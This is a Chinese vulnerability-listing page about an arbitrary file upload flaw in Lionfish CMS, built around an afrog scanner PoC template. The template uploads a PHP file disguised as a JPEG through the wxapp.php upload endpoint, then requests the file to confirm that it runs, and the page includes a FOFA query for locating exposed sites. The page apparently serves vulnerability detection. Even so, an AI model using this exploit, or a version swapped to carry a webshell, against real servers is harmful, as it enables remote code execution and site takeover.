lionfish-cms-wxapp-php-upload: 狮子鱼 CMS 任意文件上传

日期: 2025-08-01 | 影响软件: lionfish cms | POC: 已公开

漏洞描述

fofa: body="/seller.php?s=/Public/login"

PoC代码[已公开]

id: lionfish-cms-wxapp-php-upload

info:
  name: 狮子鱼 CMS 任意文件上传
  author: xpoc,sharecast
  severity: critical
  verified: true
  description: |-
    fofa: body="/seller.php?s=/Public/login"
  reference:
    - https://www.cnblogs.com/KHZ521/p/14782653.html

set:
  r1: randomInt(40000, 44800)
  rboundary: randomLowercase(8)
  randname: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /wxapp.php?controller=Goods.doPageUpload
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"upfile\"; filename=\"{{randname}}.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5({{r1}});unlink(__FILE__);?>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
    expression: response.status == 200 && response.body.bcontains(bytes(".php"))
    output:
      search: '"image_o\":\"https?:\\\\/\\\\/.*?\\/(?P<path>.*?)\"".bsubmatch(response.body)'
      path: replaceAll(search["path"], "\\", "")
  r1:
    request:
      method: GET
      path: /{{path}}
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/lionfish-cms-wxapp-php-upload.yaml

相关漏洞推荐